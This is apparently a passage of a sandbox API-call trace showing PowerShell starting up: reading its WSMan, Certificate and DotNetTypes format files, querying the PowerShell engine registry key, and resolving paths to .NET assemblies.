	[0625.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0625.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0625.385] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x23501bd, Data2=0x150, Data3=0x458f, Data4=([0]=0x9b, [1]=0x1e, [2]=0x3, [3]=0x3b, [4]=0xe1, [5]=0x5a, [6]=0x45, [7]=0xa8))) returned 0x0
	[0626.343] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xed620f51, Data2=0x528b, Data3=0x43aa, Data4=([0]=0xaa, [1]=0x94, [2]=0x12, [3]=0x41, [4]=0x67, [5]=0x83, [6]=0xbc, [7]=0xba))) returned 0x0
	[0626.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0626.346] SetErrorMode (uMode=0x1) returned 0x1
	[0626.346] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e8
	[0626.346] GetFileType (hFile=0x2e8) returned 0x1
	[0626.346] SetErrorMode (uMode=0x1) returned 0x1
	[0626.347] GetFileType (hFile=0x2e8) returned 0x1
	[0626.347] ReadFile (in: hFile=0x2e8, lpBuffer=0x32df0f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x32df0f0*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0626.350] ReadFile (in: hFile=0x2e8, lpBuffer=0x32df0f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x32df0f0*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0626.351] ReadFile (in: hFile=0x2e8, lpBuffer=0x32df0f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x32df0f0*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0626.352] ReadFile (in: hFile=0x2e8, lpBuffer=0x32df0f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x32df0f0*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0626.352] ReadFile (in: hFile=0x2e8, lpBuffer=0x32df0f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x32df0f0*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0626.354] ReadFile (in: hFile=0x2e8, lpBuffer=0x32df0f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x32df0f0*, lpNumberOfBytesRead=0x16cef8*=0xfb2, lpOverlapped=0x0) returned 1
	[0626.354] ReadFile (in: hFile=0x2e8, lpBuffer=0x32de80a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x32de80a*, lpNumberOfBytesRead=0x16cef8*=0x0, lpOverlapped=0x0) returned 1
	[0626.354] ReadFile (in: hFile=0x2e8, lpBuffer=0x32df0f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x32df0f0*, lpNumberOfBytesRead=0x16cef8*=0x0, lpOverlapped=0x0) returned 1
	[0626.354] CloseHandle (hObject=0x2e8) returned 1
	[0626.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0626.354] SetErrorMode (uMode=0x1) returned 0x1
	[0626.355] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16cea0 | out: lpFileInformation=0x16cea0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0626.355] SetErrorMode (uMode=0x1) returned 0x1
	[0626.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0626.355] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf88 | out: phkResult=0x16cf88*=0x2e8) returned 0x0
	[0626.355] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cf0c, lpData=0x0, lpcbData=0x16cf08*=0x0 | out: lpType=0x16cf0c*=0x1, lpData=0x0, lpcbData=0x16cf08*=0x56) returned 0x0
	[0626.355] CoTaskMemAlloc (cb=0x5a) returned 0x26fa90
	[0626.355] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cedc, lpData=0x26fa90, lpcbData=0x16ced8*=0x56 | out: lpType=0x16cedc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16ced8*=0x56) returned 0x0
	[0626.355] CoTaskMemFree (pv=0x26fa90) 
	[0626.355] RegCloseKey (hKey=0x2e8) returned 0x0
	[0626.355] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0626.356] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0626.360] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x8793f8c7, Data2=0xddac, Data3=0x4839, Data4=([0]=0xb0, [1]=0xe9, [2]=0xab, [3]=0xe1, [4]=0x5, [5]=0x88, [6]=0x8e, [7]=0x62))) returned 0x0
	[0626.363] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x3755604, Data2=0xb071, Data3=0x4231, Data4=([0]=0x8c, [1]=0x7f, [2]=0xba, [3]=0x7f, [4]=0x91, [5]=0x9b, [6]=0xb6, [7]=0xfd))) returned 0x0
	[0626.364] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x26da3e0f, Data2=0x3036, Data3=0x45fa, Data4=([0]=0xac, [1]=0xe, [2]=0x25, [3]=0x50, [4]=0x3f, [5]=0x66, [6]=0xa0, [7]=0xc6))) returned 0x0
	[0627.166] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xe2f8f8bc, Data2=0x8df8, Data3=0x430c, Data4=([0]=0xb6, [1]=0x68, [2]=0x3, [3]=0xc5, [4]=0xc1, [5]=0x33, [6]=0x28, [7]=0x8f))) returned 0x0
	[0627.166] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x41d98671, Data2=0xed39, Data3=0x46dd, Data4=([0]=0x98, [1]=0x8e, [2]=0xf2, [3]=0x18, [4]=0x2d, [5]=0xd1, [6]=0x90, [7]=0x7d))) returned 0x0
	[0627.166] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xdfda412, Data2=0x37d1, Data3=0x4ebb, Data4=([0]=0xb2, [1]=0xd7, [2]=0x7, [3]=0xc0, [4]=0xf3, [5]=0xdf, [6]=0xd4, [7]=0xfe))) returned 0x0
	[0627.167] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e8
	[0627.167] GetFileType (hFile=0x2e8) returned 0x1
	[0627.167] SetErrorMode (uMode=0x1) returned 0x1
	[0627.167] GetFileType (hFile=0x2e8) returned 0x1
	[0627.167] ReadFile (in: hFile=0x2e8, lpBuffer=0x332ae50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x332ae50*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.180] ReadFile (in: hFile=0x2e8, lpBuffer=0x332ae50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x332ae50*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.184] ReadFile (in: hFile=0x2e8, lpBuffer=0x332ae50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x332ae50*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.184] ReadFile (in: hFile=0x2e8, lpBuffer=0x332ae50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x332ae50*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.187] ReadFile (in: hFile=0x2e8, lpBuffer=0x332ae50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x332ae50*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.187] ReadFile (in: hFile=0x2e8, lpBuffer=0x332ae50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x332ae50*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0627.187] ReadFile (in: hFile=0x2e8, lpBuffer=0x332ae50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x332ae50*, lpNumberOfBytesRead=0x16cef8*=0xaca, lpOverlapped=0x0) returned 1
	[0627.187] ReadFile (in: hFile=0x2e8, lpBuffer=0x332a482, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x332a482*, lpNumberOfBytesRead=0x16cef8*=0x0, lpOverlapped=0x0) returned 1
	[0627.187] ReadFile (in: hFile=0x2e8, lpBuffer=0x332ae50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x332ae50*, lpNumberOfBytesRead=0x16cef8*=0x0, lpOverlapped=0x0) returned 1
	[0627.187] CloseHandle (hObject=0x2e8) returned 1
	[0627.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cc40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0627.188] SetErrorMode (uMode=0x1) returned 0x1
	[0627.188] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16cea0 | out: lpFileInformation=0x16cea0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0627.188] SetErrorMode (uMode=0x1) returned 0x1
	[0627.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0627.189] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16cf88 | out: phkResult=0x16cf88*=0x2e8) returned 0x0
	[0627.189] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cf0c, lpData=0x0, lpcbData=0x16cf08*=0x0 | out: lpType=0x16cf0c*=0x1, lpData=0x0, lpcbData=0x16cf08*=0x56) returned 0x0
	[0627.189] CoTaskMemAlloc (cb=0x5a) returned 0x26fa90
	[0627.189] RegQueryValueExW (in: hKey=0x2e8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16cedc, lpData=0x26fa90, lpcbData=0x16ced8*=0x56 | out: lpType=0x16cedc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16ced8*=0x56) returned 0x0
	[0627.189] CoTaskMemFree (pv=0x26fa90) 
	[0627.189] RegCloseKey (hKey=0x2e8) returned 0x0
	[0627.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0627.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16ca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0627.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x16c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0627.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0628.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x16c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0628.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0628.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0628.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x16c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0628.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x16c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0628.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0628.129] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x16c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0628.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0628.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0628.873] VirtualQuery (in: lpAddress=0x16ba20, lpBuffer=0x16c8e0, dwLength=0x30 | out: lpBuffer=0x16c8e0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0628.874] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xadcf4252, Data2=0x33f1, Data3=0x4255, Data4=([0]=0x8b, [1]=0x3, [2]=0xd0, [3]=0xdb, [4]=0xf3, [5]=0x63, [6]=0x46, [7]=0xcf))) returned 0x0
	[0628.875] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xaac437de, Data2=0x1042, Data3=0x4241, Data4=([0]=0x97, [1]=0xa3, [2]=0x2d, [3]=0xbf, [4]=0x97, [5]=0xbb, [6]=0xa3, [7]=0x3b))) returned 0x0
	[0628.876] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0628.877] VirtualQuery (in: lpAddress=0x16bbd0, lpBuffer=0x16ca90, dwLength=0x30 | out: lpBuffer=0x16ca90*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0628.878] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xa48d3d62, Data2=0x6b3e, Data3=0x4b5d, Data4=([0]=0xaa, [1]=0x9b, [2]=0x6b, [3]=0x28, [4]=0xf1, [5]=0x6d, [6]=0x3, [7]=0x16))) returned 0x0
	[0628.881] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0x1a1b601e, Data2=0x7cf4, Data3=0x4575, Data4=([0]=0x90, [1]=0xb3, [2]=0x52, [3]=0xc0, [4]=0x56, [5]=0xf0, [6]=0x33, [7]=0x73))) returned 0x0
	[0628.882] VirtualQuery (in: lpAddress=0x16be20, lpBuffer=0x16cce0, dwLength=0x30 | out: lpBuffer=0x16cce0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0629.873] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xf4ae0e04, Data2=0x57d2, Data3=0x4a5e, Data4=([0]=0x84, [1]=0x47, [2]=0x15, [3]=0xe0, [4]=0xba, [5]=0xd0, [6]=0x2f, [7]=0x2c))) returned 0x0
	[0629.873] VirtualQuery (in: lpAddress=0x16b490, lpBuffer=0x16c350, dwLength=0x30 | out: lpBuffer=0x16c350*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0629.874] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xef7869f6, Data2=0xfe21, Data3=0x4027, Data4=([0]=0x84, [1]=0xb, [2]=0xb7, [3]=0x75, [4]=0x52, [5]=0x18, [6]=0x94, [7]=0xa2))) returned 0x0
	[0629.874] CoCreateGuid (in: pguid=0x16d1b0 | out: pguid=0x16d1b0*(Data1=0xb2dd76f1, Data2=0xb018, Data3=0x4747, Data4=([0]=0x85, [1]=0x35, [2]=0x7e, [3]=0x4f, [4]=0x1a, [5]=0x1b, [6]=0xc3, [7]=0x4a))) returned 0x0
	[0629.874] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2e4
	[0629.874] GetFileType (hFile=0x2e4) returned 0x1
	[0629.874] SetErrorMode (uMode=0x1) returned 0x1
	[0629.874] GetFileType (hFile=0x2e4) returned 0x1
	[0629.874] ReadFile (in: hFile=0x2e4, lpBuffer=0x2cf35a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2cf35a8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.885] ReadFile (in: hFile=0x2e4, lpBuffer=0x2cf35a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2cf35a8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.886] ReadFile (in: hFile=0x2e4, lpBuffer=0x2cf35a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2cf35a8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.886] ReadFile (in: hFile=0x2e4, lpBuffer=0x2cf35a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2cf35a8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.886] ReadFile (in: hFile=0x2e4, lpBuffer=0x2cf35a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2cf35a8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.887] ReadFile (in: hFile=0x2e4, lpBuffer=0x2cf35a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2cf35a8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.887] ReadFile (in: hFile=0x2e4, lpBuffer=0x2cf35a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2cf35a8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.888] ReadFile (in: hFile=0x2e4, lpBuffer=0x2cf35a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2cf35a8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.889] ReadFile (in: hFile=0x2e4, lpBuffer=0x2cf35a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2cf35a8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.890] ReadFile (in: hFile=0x2e4, lpBuffer=0x2cf35a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2cf35a8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
	[0629.890] ReadFile (in: hFile=0x2e4, lpBuffer=0x2cf35a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16cef8, lpOverlapped=0x0 | out: lpBuffer=0x2cf35a8*, lpNumberOfBytesRead=0x16cef8*=0x1000, lpOverlapped=0x0) returned 1
